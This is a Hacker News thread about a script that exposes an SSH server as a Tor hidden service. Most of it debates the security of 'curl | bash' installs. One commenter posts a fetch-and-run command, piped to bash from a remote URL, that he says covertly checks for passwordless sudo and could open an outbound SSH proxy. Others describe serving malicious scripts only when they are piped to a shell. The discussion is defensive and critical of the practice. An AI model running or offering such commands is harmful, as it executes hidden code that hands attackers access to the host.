Hacker News new | past | comments | ask | show | jobs | submit login
Show HN: tor_ssh.sh – One command to enable SSH access via Tor (gitlab.com)
93 points by NickBusey 20 days ago | hide | past | web | favorite | 65 comments

Shameless plug: This script I wrote a while ago "automates" setting up a hidden tor ssh service that isn't faulty for ssh-host key enumeration. I'd like to improve it, but I'm not sure which audience I should target. If you could review/try it out and you have any feedback, a GitHub issue or comment here would be very appreciated.


This works pretty well, especially if you have personal computers behind different NATs. One of the issue is still that you have to distribute the tor domain name out all over the place. You also need to keep the keys safe if you want to keep that domain name.

These two part I found to be more annoying to deal with, although this is true for most VPN solutions (thinking about tinc, wireguard).

> One of the issue is still that you have to distribute the tor domain name out all over the place.

I don't understand why you couldn't have a small utility to take a human memorable password that maps to a weak-ass private key, then ratchet up to a secure keypair on the server once the initial connection is made:

1. Run utility in "server" mode.

2. Enter password "I am not the target of a state level actor atm" into utility

3. Utility maps your weak-ass password to a weak-ass private key, generates the pubkey from that, and consequently creates the Tor hidden service behind which your openssh server can now be accessed.

4. On the client, run the utility in "client" mode and type in your weak-ass password

5. Utility maps the password to the server's weakass kepair and generates the corresponding onion address from it.

6. Utility creates a tunnel over Tor to connect to that onion address.

7. Server and client are now connected, with no memorization of human unreadable strings. Hurray!

8. Once connected, the server generates a secure keypair and sends the corresponding new onion addy to the client over the current connection.

9. Client receives the new onion addy, disconnects, then connects to the new addy.

10. Repeat for each client. Once all clients are connected, server destroys the original hidden service.

I highly recommend ZeroTier for maintaining stable connectivity and static private IPs regardless of NAT or networking environment peculiarities. It also supports multipath bonding of interfaces like SD-WAN. (in an alpha branch)

We use it to connect to touring production racks using a consistent IP regardless of what concert venue ISP they might be connected to on a given day.

NAT traversal is a useful and underrated Tor hidden service use case.

Careful though: installing the version of Tor which is included in Ubuntu’s distribution is not recommended, is often very out of date.

Use the Tor project’s PPA instead.

Exactly this.

Many times people have assumed that Tor is only for 'dark web' and other things that there is no legitimate business using.

But as you say, escaping NAT is a perfect use-case. It's particularly good for escaping CGNAT, as to be honest there aren't many other ways to escape CGNAT and still have a 'listening' server, rather than just an always-open tunnel.

Edit: The Tor Project website has a useful section on how IT professionals use Tor, which covers some more interesting ones: https://www.torproject.org/about/torusers.html.en#itprofessi...

This is also valuable for debugging CI builds, and it can be more secure than the debugging mode CI services provide when coupled with an ssh key. For example on Travis CI a host is displayed in the logs that anyone can access through ssh.


This line was puzzling:

    # Remove the bogus tor service Ubuntu installs by default
Is there a bug in the upstream package or something? Otherwise this just looks like a big step back from systemd to SysV — without automatic restarts the first time the daemon exits, you're locked out of the server.

Typically I'd put that into a comment right above that line. I'd also really be inclined to install a replacement service instead so you'd get automatic restarts if you aren't very confident that you have another way into the box.

Yea, I agree. I actually was thinking before I posted this "Someone will ask about that line, I should just add the link to the comments" haha. (Just added it.)

If you read the discussion in the link, this actually does do that. It just replaces the 'empty' service with the actual tor service. So you do get automatic restarts.

  # Append the hidden service configuration to the Torrc file
  echo -e "HiddenServiceDir /var/lib/tor/onion-ssh/\nHiddenServicePort 22" > /etc/tor/torrc
Unless the '>' is changed to ">>", this will overwrite the torrc file.

The default ubuntu torrc has everything commented out so is effectively blank anyway.

Using ">" instead of ">>" means you don't end up with multiple copies of the same hidden service.

That said, I agree: it should append, but it should first check whether it has already added a hidden service to the file.

Exactly, for simplicity since nothing is in there by default, it gets overwritten. To keep the script nice and short I decided not to add that detection. I would happily merge the change if someone decides they care enough to add it.

Maybe something like

  if [ $(grep "HiddenServicePort 22" /etc/tor/torrc | wc -l) -eq 0]

Or the more idiomatic:

  if grep -q "HiddenServiceDir /var/lib/tor/onion-ssh/" /etc/tor/torrc

I wish bash had a ternary operator for extra IOCCC-compliance.

I actually presented on something close to this a couple of months ago to the local LUG. I made a raspberry pi tor jump server that would allow you to ssh over tor into your home network to bust through the NAT. My slide deck is https://content.evernote.com/shard/s84/sh/00920ea8-78a7-4b1a...

tor_ssh.sh – One command to enable SSH access via Tor to some servers: Debian is not the entirety of Linux

How come you aren't using ```HiddenServiceVersion 3```?

Onion v2 (16 char addresses) uses old crypto (SHA1/DH/RSA1024) and has now been superseded by Onion v3 (56 char addresses, SHA3/ed25519/curve25519 and many other improvements).


Will ssh experience timeouts and connection aborts detailed here http://sites.inka.de/bigred/devel/tcp-tcp.html or is that not applicable?

Nice script BTW.

There's also torsocks or even tsocks if you need something more battle tested.

EDIT: I stand corrected, see @buildbuildbuild reply.

That does the reverse: allows you to connect to public IP addresses through Tor. This solution exposes your local SSH server as a static hidden service without needing to forward ports in a NATed environment.

Posted on HN 6 days ago, by same user: (zero comments received).


"any server" running ubuntu...

I like the theory behind this and the motivation. But this has to stop:

># Usage (as root): $ bash <(curl -s https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh)

Spoon feeding like this is why Windows has such a disgusting history of malware, and only encourages people to not think about what they are doing.

It's better to tell people 'clone this repo and run this script'? I'm pretty sure people have exactly the same chance of auditing it.

curl | sh is slightly problematic from untrusted servers that might change the script depending on whether or not it's piped to a shell, but from gitlab I just don't see a difference.

Of course, it's better, because we can link to specific commit by sha256 hash, which is way more secure.

You can do that with a direct link too: bash <(curl -s https://gitlab.com/grownetics/devops/raw/ef053050065c4928714...)

No, you can't. Nothing will check SHA256 of a malware downloaded in this way, so nothing will stop malware from owning your host. To check, just put " gitlab.com" into your /etc/hosts and try to serve your own file from your URL. Git will detect this, curl will not.

Yes, try it. Unless something has changed drastically curl still checks that certificates are valid.

It looks like you assume that SSL guarantees correctness of the file.

First, I had experience with substituted SSL certificates (by our government, at revolution), when errors were reported by Chrome only due to certificate pinning for Google services.

Second, site can be hacked and replaced directly at the site.

When your threat level is government agencies then, sure, you have issues. But git wouldn't solve anything, unless you have a way to verify the hash or signature.

Can you name even a single instance of this ever distributing malware in history? If downloading an anonymous binary makes you feel safer then I think your criticism lacks merit.

I wish curl (or a similar tool shipped by default on all distros) had a flag that accepts a hash and verifies that that downloaded file matches that flag before streaming it out

I played around with that idea in https://github.com/mkmik/runck but it obviously can used for installation instructions only if it's rather ubiquitous.

Integrity of the file after transfer isn't the problem.

One possible curl/bash attack is to serve a safe file to browsers but a malicious one to curl. In that case a step where you verify the integrity of the file curl downloads would be useful.

(I seem to recall there being a way for the server to reliably guess whether the file was being piped or saved to disc, as well, which would let you restrict the malicious version even more. Google is failing me at the moment, though.)

This post demonstrates detecting the difference between a user piping the output from curl to bash OR curl to stdout.


What specific threat do you believe your advice is protecting people against?

sudo -n is a start.

Here is one I wrote that shows your internet speed, but will also check to see if you have passwordless sudo. Even without sudo, I could spawn and persist a gateway port ssh proxy outbound to a VPS node, but with sudo, I could do much more.

    curl -A Mozilla -s https://tinyvpn.org/misc/url_test.txt | bash

… and you've installed this on Gitlab's servers? If not, the knowledge that people write malicious code is not new but the problem isn't running it using curl but not vetting the source and code before you run it. Focusing on the use of curl distracts attention from the part which matters.

I understand what you are saying, but respectfully disagree.

Conditioning people to use `curl | bash` trains them to not review anything and blindly run untrusted code. I have proven this across a very large group of people, including many that are supposed to be security minded. This technique works on nearly all organizations, as most companies and government agencies do not force outbound traffic through a mitm proxy. I have mixed feelings about those devices.

For what it's worth, where the code is running from doesn't really matter. The only advantage to pulling something from gitlab or github, is that I have to commit changes that anyone could see assuming I dont recreate the repo, which I can automate in their API. From any of my own VM's or servers, I can certainly make something look like a .txt that isn't and dynamically changes based on user-agent, remote addr, latency, ttl, etc.. I could even change the response if someone used curl with a fake user-agent, based on timing, but that is another blog post for another day.

Fair enough but I would ask whether this is really that much worse than, say, running "npm install" or "pip install" for a package whose author you don't implicitly trust. From my perspective, that time would be better spent educating developers and working to make their tools safer to use — for example, using aws-vault on a Mac means that that a drive-by script cannot harvest your AWS credentials (the key chain requires prompting per-binary and the user cannot bypass it).

Tools like pip, pear, gem, etc... are quite bad as well. Unless they are validating gpg checks of files or packages against a trusted source, then you could easily be installing a package from a mirror that has been compromised. In fact, this has happened to python repositories several times.

Even gpg checks when done the way Ubuntu and Redhat do it, is also bad. I see people install the gpg keys from the mirror all the time. If I pop the mirror, I can simply put my own gpg keys in the mirror and a percentage of people will happily install it.

GPG adds usability problems and doesn’t much help in the case where people have no idea whether the remote author they’ve never met is trustworthy. In most cases something like a Linux distribution is what you want where things are at least highly visible and a trusted third-party is looking at the update history.

Modern package managers do at least store hashes so your NPM, Python, Rust, etc. packages can depend on other packages with hashes in addition to just a version, which at least forces them to attempt to make the exploit covert enough that it can be deployed to everyone but there are many ways to make something subtly vulnerable. Ultimately, I really think this is coming back to securing the environment so a successful attack gets less. Apple has led the way on protecting things like passwords and mail from other processes running as the same user but it’d be really interesting to see how far you could get running your entire toolchain using the OS’ sandboxing.

Here is a thread discussing the detection of `curl | bash` based on script timing [1]

[1] - https://news.ycombinator.com/item?id=17636032


Think about this more: what malware are you going to get by running that command that you wouldn't get by downloading the file and running it locally?

You'll eventually realize that the answer is that this advice has no value. What could potentially have value is reviewing the code before running it, which can be done either way.

There is one difference still, by downloading it locally, you only have to check it once and not everytime you want to use the script. You definitely have to trust more parties by piping from the web, and these parties could be compromised at some point. This might be fine, it depends on your own security policy.

Of course, I can get malware in both ways, so recommended way is to trust a third party, a maintainer, which will review code, and then will create signed package.

Right, so rather than talking about curl | bash it would really be better to talk about your review process since, for example, the same concerns apply if you do something like "npm install" without vetting every dependency.

Better usage would be:

- wget https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh

- less tor_ssh.sh

- sudo bash tor_ssh.sh

You are making a script to access a server through Tor, I think "paranoid" users might be most of your users.

The purpose is easy NAT traversal for things like onsite physical servers or CI testing.

Tor is not reserved for nefarious purposes.

I recently saw the term “curlbashware”, and I like it.

The command is only found in the script itself when you look at the source from gitlab. Also the script contains 7 lines in total if you remove the comments.

I get what you're trying to say but in that specific case I don't think it really applies.

I mean, that command is linked to in the actual script itself. I figure if you're already reading it, it's probably pretty safe to run. It's also what, a seven line script? Not too many places to hide anything nefarious in there.

Sure, I suppose the install directions should be more like, wget the file, cat it to be sure gitlab didn't serve you a malicious file instead(?), then run it.

Really not sure what this has to do with malware on Windows though.


This comment breaks the Show HN guidelines badly: https://news.ycombinator.com/showhn.html. It also breaks the site guidelines: https://news.ycombinator.com/newsguidelines.html.

When someone is sharing their work, being a jerk is exactly the wrong approach here. Please don't do it again.

Rather, if you know more, share some of what you know in a way that's going to help them learn, rather than humiliate. As a side bonus, you won't be acidifying this community either, which is fragile and needs all of us to protect it.

You're being downvoted, but I agree with the sentiment. The script is Debian-specific (requires apt) and all it does is basically run `/etc/init.d/tor restart` after it installs something that is inside of a repository. Not much of anything going on here.

Thank you, if my comment is downvoted for being a hater then fine, If I described true facts, then I do this proudly again-and-again. I smile on that BASH :) truly something anyone should bookmark and use daily :))) heh

1. Even if you know how to edit torrc files, I still don't think this is true.

2. Go ahead, nothing will break.

3. True, I have added a note to the script.

4. Umm, is explaining all those slashes simpler than just running a one line command? No. Only 7 lines are even functional, the rest are comments explaining things.

5. If "This file is meant to get SSH access via Tor to an Ubuntu server in one command." doesn't cover for you what it does and why, then you are not the target audience.

Yes, it is a gist for one person. I made it for myself. I thought others would find it useful. I guess that makes me a script kiddie.

Sometimes it is easier to just show someone an idea in a straightforward way rather than spend a whole lot of text describing it.

Using SSH over Tor is a supremely dumb idea unless you really need to hide your SSH sessions and you're already using other methods (pre-shared host fingerprint, single-use SSH key) to secure your session.

1) Tor exit node operators will do all kinds of nasty things: e.g. MITM-ing your sessions, refusing to handle certain kinds of traffic, and recording everything.

2) If you use your regular SSH key (which you will, because you needed to use this script to do this), your SSH key fingerprint and thus your identity is still recorded by the remote host. Doh!

3) Everyone at the remote host will think you got haxed. Because you're logging in through Tor. Or else they'll think you're super shady.

That said, Tor is super fun to play around with. Just don't assume anything gives you real protection unless you're careful and really know the ins and outs.

1.) This doesn't go via an exit node, so this point is invalid.

2.) Why is this a problem? You already own the remote host, so you already know your identity.

3.) It will appear to the remote host as a login from the loopback device. And if you set this up you presumably own the remote host anyway so you don't care what its owner thinks.

Applications are open for YC Summer 2019

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact